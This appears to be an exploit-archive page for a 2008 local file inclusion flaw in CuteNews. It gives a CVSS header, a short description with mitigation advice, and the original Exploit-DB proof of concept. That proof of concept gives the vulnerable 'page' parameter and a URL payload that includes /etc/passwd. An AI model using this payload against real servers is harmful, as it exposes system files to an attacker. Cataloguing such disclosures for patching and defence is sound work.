header-logo
Suggest Exploit
vendor:
CuteNews
by:
eidelweiss
7,5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: CuteNews
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

CuteNews (page) local File Inclusion Vulnerability

CuteNews is vulnerable to local file inclusion vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request with malicious page parameter. The malicious page parameter can be used to include local files from the web server. For example, an attacker can send a crafted HTTP request with page parameter set to /etc/passwd to include the content of the /etc/passwd file.

Mitigation:

The best way to mitigate this vulnerability is to restrict access to the vulnerable page parameter. The application should also validate the page parameter to ensure that it does not contain any malicious content.
Source

Exploit-DB raw data:

==========================================================
	CuteNews (page) local File Inclusion Vulnerability
==========================================================
vendor: http://cutephp.com/
Author: eidelweiss
Contact: eidelweiss [at] windowslive [dot] com

==========================================================

vuln: index.php?page=

lfi: /etc/passwd

exploit : index.php?page= [lfi]

	-=[p0c]=-
	
	http://127.0.0.1/index.php?page= [lfi]
			or
	http://127.0.0.1/path/index.php?page=/etc/passwdt

=========================| -=[ E0F ]=- |============================

Navigation

Suggest Exploit

Services By CQR